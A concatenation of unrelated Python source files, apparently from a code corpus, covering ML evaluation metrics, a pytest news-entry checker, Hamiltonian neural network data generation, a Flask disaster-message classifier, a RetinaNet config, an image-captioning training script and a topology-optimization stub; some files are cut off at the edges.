"probs": probs,
"accuracy": accuracy,
"labels": labels,
"num_seqs": num_seqs,
"qids": qids
}
elif is_regression:
cost = fluid.layers.square_error_cost(input=logits, label=labels)
loss = fluid.layers.mean(x=cost)
graph_vars = {
"loss": loss,
"probs": logits,
"labels": labels,
"num_seqs": num_seqs,
"qids": qids
}
else:
raise ValueError(
'unsupported fine tune mode. only supported classify/regression')
return pyreader, graph_vars
def evaluate_mrr(preds):
last_qid = None
total_mrr = 0.0
qnum = 0.0
rank = 0.0
correct = False
for qid, score, label in preds:
if qid != last_qid:
rank = 0.0
qnum += 1
correct = False
last_qid = qid
rank += 1
if not correct and label != 0:
total_mrr += 1.0 / rank
correct = True
return total_mrr / qnum
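# Worked illustration with hypothetical (qid, score, label) triples, already
# sorted by qid and descending score as the caller does:
#   qid 1 -> labels [0, 1, 0]: first relevant hit at rank 2, contributes 1/2
#   qid 2 -> labels [1, 0]:    first relevant hit at rank 1, contributes 1
#   evaluate_mrr(...) == (0.5 + 1.0) / 2 == 0.75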
def evaluate_map(preds):
def singe_map(st, en):
total_p = 0.0
correct_num = 0.0
for index in xrange(st, en):
if int(preds[index][2]) != 0:
correct_num += 1
total_p += correct_num / (index - st + 1)
if int(correct_num) == 0:
return 0.0
return total_p / correct_num
last_qid = None
total_map = 0.0
qnum = 0.0
st = 0
for i in xrange(len(preds)):
qid = preds[i][0]
if qid != last_qid:
qnum += 1
if last_qid != None:
total_map += singe_map(st, i)
st = i
last_qid = qid
total_map += singe_map(st, len(preds))
return total_map / qnum
def evaluate_classify(exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=False,
metric='simple_accuracy',
is_classify=False,
is_regression=False):
train_fetch_list = [
graph_vars["loss"].name, graph_vars["accuracy"].name,
graph_vars["num_seqs"].name
]
if eval_phase == "train":
if "learning_rate" in graph_vars:
train_fetch_list.append(graph_vars["learning_rate"].name)
outputs = exe.run(fetch_list=train_fetch_list)
ret = {"loss": np.mean(outputs[0]), "accuracy": np.mean(outputs[1])}
if "learning_rate" in graph_vars:
ret["learning_rate"] = float(outputs[3][0])
return ret
test_pyreader.start()
total_cost, total_acc, total_num_seqs, total_label_pos_num, total_pred_pos_num, total_correct_num = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
qids, labels, scores, preds = [], [], [], []
time_begin = time.time()
fetch_list = [
graph_vars["loss"].name, graph_vars["accuracy"].name,
graph_vars["probs"].name, graph_vars["labels"].name,
graph_vars["num_seqs"].name, graph_vars["qids"].name
]
while True:
try:
if use_multi_gpu_test:
np_loss, np_acc, np_probs, np_labels, np_num_seqs, np_qids = exe.run(
fetch_list=fetch_list)
else:
np_loss, np_acc, np_probs, np_labels, np_num_seqs, np_qids = exe.run(
program=test_program, fetch_list=fetch_list)
total_cost += np.sum(np_loss * np_num_seqs)
total_acc += np.sum(np_acc * np_num_seqs)
total_num_seqs += np.sum(np_num_seqs)
labels.extend(np_labels.reshape((-1)).tolist())
if np_qids is None:
np_qids = np.array([])
qids.extend(np_qids.reshape(-1).tolist())
scores.extend(np_probs[:, 1].reshape(-1).tolist())
np_preds = np.argmax(np_probs, axis=1).astype(np.float32)
preds.extend(np_preds)
total_label_pos_num += np.sum(np_labels)
total_pred_pos_num += np.sum(np_preds)
total_correct_num += np.sum(np.dot(np_preds, np_labels))
except fluid.core.EOFException:
test_pyreader.reset()
break
time_end = time.time()
cost = total_cost / total_num_seqs
elapsed_time = time_end - time_begin
evaluate_info = ""
if metric == 'acc_and_f1':
ret = acc_and_f1(preds, labels)
evaluate_info = "[%s evaluation] ave loss: %f, ave_acc: %f, f1: %f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret['acc'], ret['f1'], total_num_seqs, elapsed_time)
elif metric == 'matthews_corrcoef':
ret = matthews_corrcoef(preds, labels)
evaluate_info = "[%s evaluation] ave loss: %f, matthews_corrcoef: %f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret, total_num_seqs, elapsed_time)
elif metric == 'pearson_and_spearman':
ret = pearson_and_spearman(scores, labels)
evaluate_info = "[%s evaluation] ave loss: %f, pearson:%f, spearman:%f, corr:%f, data_num: %d, elapsed time: %f s" \
            % (eval_phase, cost, ret['pearson'], ret['spearmanr'], ret['corr'], total_num_seqs, elapsed_time)
elif metric == 'simple_accuracy':
ret = simple_accuracy(preds, labels)
evaluate_info = "[%s evaluation] ave loss: %f, acc:%f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret, total_num_seqs, elapsed_time)
evaluate_info = "loss:%f acc:%0.2f data_nums:%d time:%fs" \
% (cost, ret, total_num_seqs, elapsed_time)
elif metric == "acc_and_f1_and_mrr":
ret_a = acc_and_f1(preds, labels)
preds = sorted(
zip(qids, scores, labels), key=lambda elem: (elem[0], -elem[1]))
ret_b = evaluate_mrr(preds)
evaluate_info = "[%s evaluation] ave loss: %f, acc: %f, f1: %f, mrr: %f, data_num: %d, elapsed time: %f s" \
% (eval_phase, cost, ret_a['acc'], ret_a['f1'], ret_b, total_num_seqs, elapsed_time)
else:
raise ValueError('unsupported metric {}'.format(metric))
return evaluate_info
def evaluate_regression(exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=False,
metric='pearson_and_spearman'):
if eval_phase == "train":
train_fetch_list = [graph_vars["loss"].name]
if "learning_rate" in graph_vars:
train_fetch_list.append(graph_vars["learning_rate"].name)
outputs = exe.run(fetch_list=train_fetch_list)
ret = {"loss": np.mean(outputs[0])}
if "learning_rate" in graph_vars:
ret["learning_rate"] = float(outputs[1][0])
return ret
test_pyreader.start()
total_cost, total_num_seqs = 0.0, 0.0
qids, labels, scores = [], [], []
fetch_list = [
graph_vars["loss"].name, graph_vars["probs"].name,
graph_vars["labels"].name, graph_vars["qids"].name
]
time_begin = time.time()
while True:
try:
if use_multi_gpu_test:
np_loss, np_probs, np_labels, np_qids = exe.run(
fetch_list=fetch_list)
else:
np_loss, np_probs, np_labels, np_qids = exe.run(
program=test_program, fetch_list=fetch_list)
labels.extend(np_labels.reshape((-1)).tolist())
if np_qids is None:
np_qids = np.array([])
qids.extend(np_qids.reshape(-1).tolist())
scores.extend(np_probs.reshape(-1).tolist())
except fluid.core.EOFException:
test_pyreader.reset()
break
time_end = time.time()
elapsed_time = time_end - time_begin
if metric == 'pearson_and_spearman':
ret = pearson_and_spearman(scores, labels)
evaluate_info = "[%s evaluation] ave loss: %f, pearson:%f, spearman:%f, corr:%f, elapsed time: %f s" \
% (eval_phase, 0.0, ret['pearson'], ret['spearmanr'], ret['corr'], elapsed_time)
else:
raise ValueError('unsupported metric {}'.format(metric))
return evaluate_info
def evaluate(exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=False,
metric='simple_accuracy',
is_classify=False,
is_regression=False):
if is_classify:
return evaluate_classify(
exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=use_multi_gpu_test,
metric=metric)
else:
return evaluate_regression(
exe,
test_program,
test_pyreader,
graph_vars,
eval_phase,
use_multi_gpu_test=use_multi_gpu_test,
metric=metric)
def matthews_corrcoef(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
tp = np.sum((labels == 1) & (preds == 1))
tn = np.sum((labels == 0) & (preds == 0))
fp = np.sum((labels == 0) & (preds == 1))
fn = np.sum((labels == 1) & (preds == 0))
mcc = ((tp * tn) - (fp * fn)) / np.sqrt(
(tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
return mcc
def f1_score(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
tp = np.sum((labels == 1) & (preds == 1))
tn = np.sum((labels == 0) & (preds == 0))
fp = np.sum((labels == 0) & (preds == 1))
fn = np.sum((labels == 1) & (preds == 0))
p = tp / (tp + fp)
r = tp / (tp + fn)
f1 = (2 * p * r) / (p + r + 1e-8)
return f1
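# Tiny worked example (hypothetical values): preds = [1, 1, 0, 0] and
# labels = [1, 0, 0, 1] give tp = tn = fp = fn = 1, so precision = recall = 0.5
# and f1_score(...) ~= 0.5; the 1e-8 term only guards against a zero denominator.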
def pearson_and_spearman(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
pearson_corr = pearsonr(preds, labels)[0]
spearman_corr = spearmanr(preds, labels)[0]
return {
"pearson": pearson_corr,
"spearmanr": spearman_corr,
"corr": (pearson_corr + spearman_corr) / 2,
}
def acc_and_f1(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
acc = simple_accuracy(preds, labels)
f1 = f1_score(preds, labels)
return {
"acc": acc,
"f1": f1,
"acc_and_f1": (acc + f1) / 2,
}
def simple_accuracy(preds, labels):
preds = np.array(preds)
labels = np.array(labels)
return (preds == labels).mean()
def predict(exe,
test_program,
test_pyreader,
graph_vars,
dev_count=1,
is_classify=False,
is_regression=False):
test_pyreader.start()
qids, scores, probs = [], [], []
preds = []
fetch_list = [graph_vars["probs"].name, graph_vars["qids"].name]
while True:
try:
if dev_count == 1:
np_probs, np_qids = exe.run(program=test_program,
fetch_list=fetch_list)
else:
np_probs, np_qids = exe.run(fetch_list=fetch_list)
if np_qids is None:
np_qids = np.array([])
qids.extend(np_qids.reshape(-1).tolist())
if is_classify:
np_preds = np.argmax(np_probs, axis=1).astype(np.float32)
preds.extend(np_preds)
elif is_regression:
preds.extend(np_probs.reshape(-1))
probs.append(np_probs)
except fluid.core.EOFException:
test_pyreader.reset()
break
probs = np.concatenate(probs, axis=0).reshape([len(preds), -1])
return qids, preds, probs
|
the-stack_106_13076
|
"""Testing that news entries are well formed."""
import os
import re
import pytest
NEWSDIR = os.path.join(os.path.dirname(os.path.dirname(__file__)), "news")
CATEGORIES = frozenset(
["Added", "Changed", "Deprecated", "Removed", "Fixed", "Security"]
)
single_grave_reg = re.compile(r"[^`]`[^`]+`[^`_]")
def check_news_file(fname):
import restructuredtext_lint
name = fname.name
with open(fname.path) as f:
content = f.read()
errors = restructuredtext_lint.lint(content)
if errors:
err_msgs = os.linesep.join(err.message for err in errors)
pytest.fail(f"{fname}: Invalid ReST\n{err_msgs}")
form = ""
for i, l in enumerate(content.splitlines()):
# determine the form of line
if l.startswith("**"):
cat = l[2:].rsplit(":")[0]
if cat not in CATEGORIES:
pytest.fail(
"{}:{}: {!r} not a proper category "
"must be one of {}"
"".format(name, i + 1, cat, list(CATEGORIES)),
pytrace=True,
)
if l.endswith("None"):
form += "3"
else:
form += "2"
elif l.startswith("* <news item>"):
form += "4"
elif l.startswith("* ") or l.startswith("- ") or l.startswith(" "):
form += "1"
elif l.strip() == "":
form += "0"
else:
pytest.fail(f"{name}:{i + 1}: invalid rst", pytrace=True)
# The file should have:
# empty lines around categories
# at least one content line in a non null category
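    # Decoding of the form string built above (a reading of the loop, added for
    # clarity): '2' = category header with content, '3' = category header set to
    # None, '4' = the "* <news item>" placeholder, '1' = a bullet or continuation
    # line, '0' = a blank line.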
reg = re.compile(r"^(3(0|$)|20(1|4)(1|0|4)*0|204$)+$")
if not reg.match(form):
print(form)
pytest.fail(f"{name}: invalid rst", pytrace=True)
@pytest.fixture(params=list(os.scandir(NEWSDIR)))
def fname(request):
if request.node.config.option.markexpr != "news":
pytest.skip("Run news items check explicitly")
return request.param
@pytest.mark.news
def test_news(fname):
base, ext = os.path.splitext(fname.path)
assert "rst" in ext
check_news_file(fname)
|
the-stack_106_13077
|
# Hamiltonian Neural Networks | 2019
# Sam Greydanus, Misko Dzamba, Jason Yosinski
import autograd
import autograd.numpy as np
from scipy.stats import norm
import scipy.integrate
solve_ivp = scipy.integrate.solve_ivp
def hamiltonian_fn(coords):
# q, p = np.split(coords,2)
# mu = 2.0
# sigma = 0.15
# H = (q-mu)**2/(2*sigma) + p**2/2 # Normal PDF
q, p = np.split(coords,2)
mu1 = 1.0
mu2 = -1.0
sigma = 0.25
term1 = -np.log(0.5*(np.exp(-(q-mu1)**2/(2*sigma**2)))+0.5*(np.exp(-(q-mu2)**2/(2*sigma**2))))
H = term1 + p**2/2 # Normal PDF
return H
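# In symbols (a sketch of what hamiltonian_fn computes): the potential is the
# negative log of an equal-weight mixture of two Gaussians centred at mu1 = +1
# and mu2 = -1,
#   U(q) = -log(0.5*exp(-(q-mu1)^2/(2*sigma^2)) + 0.5*exp(-(q-mu2)^2/(2*sigma^2))),
# with the 1/sqrt(2*pi*sigma^2) normalisation dropped (it only shifts H by a
# constant), and the full Hamiltonian is H(q, p) = U(q) + p^2/2.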
def dynamics_fn(t, coords):
dcoords = autograd.grad(hamiltonian_fn)(coords)
dqdt, dpdt = np.split(dcoords,2)
S = np.concatenate([dpdt, -dqdt], axis=-1)
return S
def get_trajectory(t_span=[0,20], timescale=20, radius=None, y0=None, noise_std=0.01, **kwargs):
t_eval = np.linspace(t_span[0], t_span[1], int(timescale*(t_span[1]-t_span[0])))
# get initial state
# if y0 is None:
# y0 = np.random.rand(2)*2.-1
# if radius is None:
# radius = np.random.rand() + 1.3 # sample a range of radii
if y0 is None:
y0 = np.array([0.,0.])
if np.random.rand(1)<0.5:
y0[0] = norm(loc=1.,scale=0.3).rvs()
else:
y0[0] = norm(loc=-1.,scale=0.3).rvs()
y0[1] = norm(loc=0,scale=2).rvs() # np.random.rand(1)*3-3 #
# y0 = np.random.rand(2)*1.5-1.5
# if radius is None:
# radius = np.random.rand() + 4.1 # sample a range of radii
# y0 = y0 / np.sqrt((y0**2).sum()) * radius ## set the appropriate radius
spring_ivp = solve_ivp(fun=dynamics_fn, t_span=t_span, y0=y0, t_eval=t_eval, rtol=1e-10, **kwargs)
q, p = spring_ivp['y'][0], spring_ivp['y'][1]
dydt = [dynamics_fn(None, y) for y in spring_ivp['y'].T]
dydt = np.stack(dydt).T
dqdt, dpdt = np.split(dydt,2)
# add noise
q += np.random.randn(*q.shape)*noise_std
p += np.random.randn(*p.shape)*noise_std
return q, p, dqdt, dpdt, t_eval
def get_dataset(seed=0, samples=20, test_split=1.0, **kwargs):
data = {'meta': locals()}
# randomly sample inputs
np.random.seed(seed)
xs, dxs = [], []
for s in range(samples):
x, y, dx, dy, t = get_trajectory(**kwargs)
xs.append( np.stack( [x, y]).T )
dxs.append( np.stack( [dx, dy]).T )
data['x'] = np.concatenate(xs)
data['dx'] = np.concatenate(dxs).squeeze()
# make a train/test split
split_ix = int(len(data['x']) * test_split)
split_data = {}
for k in ['x', 'dx']:
split_data[k], split_data['test_' + k] = data[k][:split_ix], data[k][split_ix:]
data = split_data
return data
def get_field(xmin=-1.2, xmax=1.2, ymin=-1.2, ymax=1.2, gridsize=20):
field = {'meta': locals()}
# meshgrid to get vector field
b, a = np.meshgrid(np.linspace(xmin, xmax, gridsize), np.linspace(ymin, ymax, gridsize))
ys = np.stack([b.flatten(), a.flatten()])
# get vector directions
dydt = [dynamics_fn(None, y) for y in ys.T]
dydt = np.stack(dydt).T
field['x'] = ys.T
field['dx'] = dydt.T
return field
|
the-stack_106_13080
|
import nltk
nltk.download('stopwords')
import json
import plotly
import pandas as pd
import string
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from flask import Flask
from flask import render_template, request, jsonify
from plotly.graph_objs import Bar
from sklearn.externals import joblib
from sqlalchemy import create_engine
from collections import Counter
import json, plotly
import numpy as np
import operator
from pprint import pprint
import re
from sklearn.base import BaseEstimator, TransformerMixin
from nltk.corpus import stopwords
app = Flask(__name__)
class WordCount(BaseEstimator, TransformerMixin):
def word_count(self, text):
table = text.maketrans(dict.fromkeys(string.punctuation))
words = word_tokenize(text.lower().strip().translate(table))
return len(words)
def fit(self, x, y=None):
return self
def transform(self, x):
count = pd.Series(x).apply(self.word_count)
return pd.DataFrame(count)
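# Illustrative behaviour of the transformer above (assumes the NLTK 'punkt'
# tokenizer data is available): WordCount().transform(["Need water!", "Help"])
# yields a single-column DataFrame holding the word counts [2, 1].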
def tokenize(text):
"""
Tokenizes text data
Args:
text str: Messages as text data
Returns:
        words list: Processed text after normalizing, tokenizing and lemmatizing
"""
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
words = word_tokenize(text)
stopwords_ = stopwords.words("english")
words = [word for word in words if word not in stopwords_]
# extract root form of words
words = [WordNetLemmatizer().lemmatize(word) for word in words]
return words
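# Illustrative example (assumes the NLTK 'stopwords' and 'wordnet' corpora plus
# the 'punkt' tokenizer are available locally):
#   tokenize("We need water and food!")  ->  ['need', 'water', 'food']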
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('disaster', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
genre_counts = df.groupby('genre').count()['message']
genre_names = list(genre_counts.index)
cat_p = df[df.columns[4:]].sum()/len(df)
cat_p = cat_p.sort_values(ascending = False)
cats = list(cat_p.index)
words_with_repetition=[]
figures = [
{
'data': [
Bar(
x=genre_names,
y=genre_counts
)
],
'layout': {
'title': 'Distribution of Message Genres',
'yaxis': {
'title': "Count"
},
'xaxis': {
'title': "Genre"
}
}
},
{
'data': [
Bar(
x=cats,
y=cat_p
)
],
'layout': {
'title': 'Proportion of Messages <br> by Category',
'yaxis': {
'title': "Proportion",
'automargin':True
},
'xaxis': {
'title': "Category",
'tickangle': -40,
'automargin':True
}
}
}
]
ids = ["figure-{}".format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
return render_template('master.html', ids=ids, figuresJSON=figuresJSON, data_set=df)
@app.route('/go')
def go():
query = request.args.get('query', '')
classification_labels = model.predict([query])[0]
classification_results = dict(zip(df.columns[4:], classification_labels))
return render_template(
'go.html',
query=query,
classification_result=classification_results
)
def main():
app.run(host='0.0.0.0', port=3001, debug=True)
if __name__ == '__main__':
main()
|
the-stack_106_13081
|
# Copyright 2018 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This technique was inspired by the gazelle rule implementation in bazelbuild/rules_go:
# https://github.com/bazelbuild/rules_go/blob/86ade29284ca11deeead86c061e9ba9bd0d157e0/go/private/tools/gazelle.bzl
# Writes out a script which saves the runfiles directory,
# changes to the workspace root, and then runs a command.
def _workspace_binary_script_impl(ctx):
content_header = """#!/usr/bin/env bash
# --- begin runfiles.bash initialization v2 ---
# Copy-pasted from the Bazel Bash runfiles library v2.
set -uo pipefail; f=bazel_tools/tools/bash/runfiles/runfiles.bash
source "${RUNFILES_DIR:-/dev/null}/$f" 2>/dev/null || \
source "$(grep -sm1 "^$f " "${RUNFILES_MANIFEST_FILE:-/dev/null}" | cut -f2- -d' ')" 2>/dev/null || \
source "$0.runfiles/$f" 2>/dev/null || \
source "$(grep -sm1 "^$f " "$0.runfiles_manifest" | cut -f2- -d' ')" 2>/dev/null || \
source "$(grep -sm1 "^$f " "$0.exe.runfiles_manifest" | cut -f2- -d' ')" 2>/dev/null || \
{ echo>&2 "ERROR: cannot find $f"; exit 1; }; f=; set -e
# --- end runfiles.bash initialization v2 ---
"""
content = content_header + """
set -o errexit
set -o nounset
set -o pipefail
BASE=$(pwd)
cd $(dirname $(readlink {root_file}))
"$BASE/{cmd}" $@
""".format(
cmd = ctx.file.cmd.short_path,
root_file = ctx.file.root_file.short_path,
)
ctx.actions.write(
output = ctx.outputs.executable,
content = content,
is_executable = True,
)
runfiles = ctx.runfiles(
files = [
ctx.file.cmd,
ctx.file.root_file,
] + ctx.files._bash_runfiles,
)
return [DefaultInfo(runfiles = runfiles)]
_workspace_binary_script = rule(
attrs = {
"cmd": attr.label(
mandatory = True,
allow_single_file = True,
),
"root_file": attr.label(
mandatory = True,
allow_single_file = True,
),
"_bash_runfiles": attr.label(
allow_files = True,
default = "@bazel_tools//tools/bash/runfiles",
),
},
executable = True,
implementation = _workspace_binary_script_impl,
)
# Wraps a binary to be run in the workspace root via bazel run.
#
# For example, one might do something like
#
# workspace_binary(
# name = "dep",
# cmd = "//vendor/github.com/golang/dep/cmd/dep",
# )
#
# which would allow running dep with bazel run.
def workspace_binary(
name,
cmd,
args = None,
visibility = None,
data = None,
root_file = "//:WORKSPACE"):
script_name = name + "_script"
_workspace_binary_script(
name = script_name,
cmd = cmd,
root_file = root_file,
tags = ["manual"],
)
native.sh_binary(
name = name,
srcs = [":" + script_name],
args = args,
data = data,
visibility = visibility,
tags = ["manual"],
)
|
the-stack_106_13083
|
_base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
bbox_head=dict(
type='RetinaHead',
num_classes=80,
in_channels=256,
stacked_convs=4,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=4,
scales_per_octave=3,
ratios=[0.5, 1.0, 2.0],
strides=[8, 16, 32, 64, 128]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0.0, 0.0, 0.0, 0.0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
use_vfl=True,
loss_cls_vfl=dict(
type='VarifocalLoss',
use_sigmoid=True,
alpha=0.75,
gamma=2.0,
iou_weighted=True,
loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)))
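# Note (added): this config keeps the stock FocalLoss entry but also enables
# VarifocalLoss through use_vfl/loss_cls_vfl; which of the two is actually used
# is decided by the RetinaHead implementation in the surrounding codebase, not
# by this file.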
data = dict(samples_per_gpu=4, workers_per_gpu=4)
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=None)
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=0.1,
step=[8, 11])
total_epochs = 12
checkpoint_config = dict(interval=1)
log_config = dict(interval=50, hooks=[dict(type='TextLoggerHook')])
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
the-stack_106_13085
|
import glob
import pathlib
import pickle
import numpy as np
from nltk.translate.bleu_score import corpus_bleu
from sklearn.model_selection import train_test_split
from tensorflow.keras.applications.vgg16 import *
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.layers import *
from tensorflow.keras.models import *
from tensorflow.keras.preprocessing.sequence import \
pad_sequences
from ch7.recipe1.extract_features import ImageCaptionFeatureExtractor
BASE_PATH = (pathlib.Path.home() / '.keras' / 'datasets' /
'flickr8k')
IMAGES_PATH = str(BASE_PATH / 'Images')
CAPTIONS_PATH = str(BASE_PATH / 'captions.txt')
OUTPUT_PATH = '.'
def load_paths_and_captions():
image_paths = list(glob.glob(f'{IMAGES_PATH}/*.jpg'))
with open(f'{CAPTIONS_PATH}', 'r') as f:
text = f.read()
lines = text.split('\n')
mapping = {}
for line in lines:
if '.jpg' not in line:
continue
tokens = line.split(',', maxsplit=1)
if len(line) < 2:
continue
image_id, image_caption = tokens
image_id = image_id.split('.')[0]
captions_per_image = mapping.get(image_id, [])
captions_per_image.append(image_caption)
mapping[image_id] = captions_per_image
all_captions = []
for image_path in image_paths:
image_id = image_path.split('/')[-1].split('.')[0]
all_captions.append(mapping[image_id][0])
return image_paths, all_captions
def build_network(vocabulary_size,
max_sequence_length,
input_shape=(4096,)):
feature_inputs = Input(shape=input_shape)
x = Dropout(rate=0.5)(feature_inputs)
x = Dense(units=256)(x)
feature_output = ReLU()(x)
sequence_inputs = Input(shape=(max_sequence_length,))
y = Embedding(input_dim=vocabulary_size,
output_dim=256,
mask_zero=True)(sequence_inputs)
y = Dropout(rate=0.5)(y)
sequence_output = LSTM(units=256)(y)
z = Add()([feature_output, sequence_output])
z = Dense(units=256)(z)
z = ReLU()(z)
z = Dense(units=vocabulary_size)(z)
outputs = Softmax()(z)
return Model(inputs=[feature_inputs, sequence_inputs],
outputs=outputs)
def get_word_from_index(tokenizer, index):
return tokenizer.index_word.get(index, None)
def produce_caption(model,
tokenizer,
image,
max_sequence_length):
text = 'beginsequence'
for i in range(max_sequence_length):
sequence = tokenizer.texts_to_sequences([text])[0]
sequence = pad_sequences([sequence],
maxlen=max_sequence_length)
prediction = model.predict([[image], sequence])
index = np.argmax(prediction)
word = get_word_from_index(tokenizer, index)
if word is None:
break
text += f' {word}'
if word == 'endsequence':
break
return text
def evaluate_model(model, features, captions, tokenizer,
max_seq_length):
actual = []
predicted = []
for feature, caption in zip(features, captions):
generated_caption = produce_caption(model,
tokenizer,
feature,
max_seq_length)
actual.append([caption.split(' ')])
predicted.append(generated_caption.split(' '))
for index, weights in enumerate([(1.0, 0, 0, 0),
(0.5, 0.5, 0, 0),
(0.3, 0.3, 0.3, 0),
(0.25, 0.25, 0.25, 0.25)],
start=1):
b_score = corpus_bleu(actual, predicted, weights)
print(f'BLEU-{index}: {b_score}')
image_paths, all_captions = load_paths_and_captions()
extractor_model = VGG16(weights='imagenet')
inputs = extractor_model.inputs
outputs = extractor_model.layers[-2].output
extractor_model = Model(inputs=inputs, outputs=outputs)
extractor = ImageCaptionFeatureExtractor(
feature_extractor=extractor_model,
output_path=OUTPUT_PATH)
extractor.extract_features(image_paths, all_captions)
pickled_data = []
for p in [f'{OUTPUT_PATH}/input_features.pickle',
f'{OUTPUT_PATH}/input_sequences.pickle',
f'{OUTPUT_PATH}/output_sequences.pickle']:
with open(p, 'rb') as f:
pickled_data.append(pickle.load(f))
input_feats, input_seqs, output_seqs = pickled_data
(train_input_feats, test_input_feats,
train_input_seqs, test_input_seqs,
train_output_seqs,
test_output_seqs) = train_test_split(input_feats,
input_seqs,
output_seqs,
train_size=0.8,
random_state=9)
vocabulary_size = len(extractor.tokenizer.word_index) + 1
model = build_network(vocabulary_size,
extractor.max_seq_length)
model.compile(loss='categorical_crossentropy',
optimizer='adam')
checkpoint_path = ('model-ep{epoch:03d}-loss{loss:.3f}-'
'val_loss{val_loss:.3f}.h5')
checkpoint = ModelCheckpoint(checkpoint_path,
monitor='val_loss',
verbose=1,
save_best_only=True,
mode='min')
checkpoints = sorted(list(glob.glob('./*.h5')), reverse=True)
if len(checkpoints) > 0:
model = load_model(checkpoints[0])
else:
EPOCHS = 30
model.fit(x=[train_input_feats, train_input_seqs],
y=train_output_seqs,
epochs=EPOCHS,
callbacks=[checkpoint],
validation_data=([test_input_feats, test_input_seqs],
test_output_seqs))
with open(f'{OUTPUT_PATH}/data_mapping.pickle', 'rb') as f:
data_mapping = pickle.load(f)
feats = [v['features'] for v in data_mapping.values()]
captions = [v['caption'] for v in data_mapping.values()]
evaluate_model(model,
features=feats,
captions=captions,
tokenizer=extractor.tokenizer,
max_seq_length=extractor.max_seq_length)
|
the-stack_106_13087
|
# def geomProg(a,b,c):
# """a - число которое в гепрогресию
# b - количество шагов в прогрессии
# с - на сколько множим"""
# for i in range(b):
# yield a
# a *= c
# test = geomProg(2, 10, 2)
# for i in test:
# print(i)
import re
file = '[email protected]'
regex = r"^([a-z0-9_-_!#%&'\"_`+/=?{}|~-]+\.)*[a-z0-9_-_!#%&'\"`+/=?{}|~]+@(([a-z0-9]+[\-_?]*[a-z0-9]+)*\.[a-z]{2,6}){0,63}$"
recheck = re.fullmatch(regex, file)
print(recheck)
|
the-stack_106_13091
|
from dlpipe.processors.processor_interface import IPreProcessor
import numpy as np
DATA_INFO = {
"age": {"norm": 98},
"nr_person_hurt": {"norm": 3},
"nr_vehicles": {"norm": 4}
}
class PreProcessData(IPreProcessor):
def process(self, raw_data, input_data, ground_truth, piped_params=None):
ground_truth = np.zeros(3)
if "accident_severity" in raw_data:
index = min(int(raw_data["accident_severity"]), 2)
ground_truth[index] = 1.0
list_input = []
# sin and cos components are already normalized
list_input.append(float(raw_data["date"]["sin"]))
list_input.append(float(raw_data["date"]["cos"]))
list_input.append(float(raw_data["time"]["sin"]))
list_input.append(float(raw_data["time"]["cos"]))
# normalize features
list_input.append(int(raw_data["age"]) / DATA_INFO["age"]["norm"])
list_input.append(int(raw_data["nr_person_hurt"]) / DATA_INFO["nr_person_hurt"]["norm"])
list_input.append(int(raw_data["nr_vehicles"]) / DATA_INFO["nr_vehicles"]["norm"])
# some classification features have "unknown" columns at the end which are sliced off
list_input += raw_data["class"]["encoded"]
list_input += raw_data["light"]["encoded"]
list_input += raw_data["weather"]["encoded"][:-1]
list_input += raw_data["ground_condition"]["encoded"][:-1]
list_input += raw_data["gender"]["encoded"]
list_input += raw_data["vehicle_type"]["encoded"][:-1]
list_input += raw_data["road_type"]["encoded"][:-1]
input_data = np.asarray(list_input)
return raw_data, input_data, ground_truth, piped_params
|
the-stack_106_13094
|
from common import ProblemType
from solver import Solver
from gui import Gui
import images
def multires(nelx, nely, params, bc):
# Allocate design variables for the first level
x = None
x_comp = None
# Dynamic parameters
downsampling = 2**(params.numLevels - 1)
params.exemplarDownsampling *= downsampling
# Multires synthesis
for level in range(params.numLevels):
print("*** Level " + str(level))
if x is not None:
# Upsample previous solution
x = images.upsample(x, nelx, nely)
if params.problemType == ProblemType.AppearanceWithMaxCompliance:
x_comp = images.upsample(x_comp, nelx, nely)
gui = None
if params.hasGui:
gui = Gui(nelx, nely)
if params.problemType == ProblemType.AppearanceWithMaxCompliance:
params.complianceMax = 0
solver = Solver(nelx, nely, params, ProblemType.Compliance, bc, gui)
x_comp = solver.optimize(x_comp)
min_compliance = solver.last_optimum_value()
params.complianceMax = min_compliance * params.complianceMaxFactor
print("")
# Solve problem
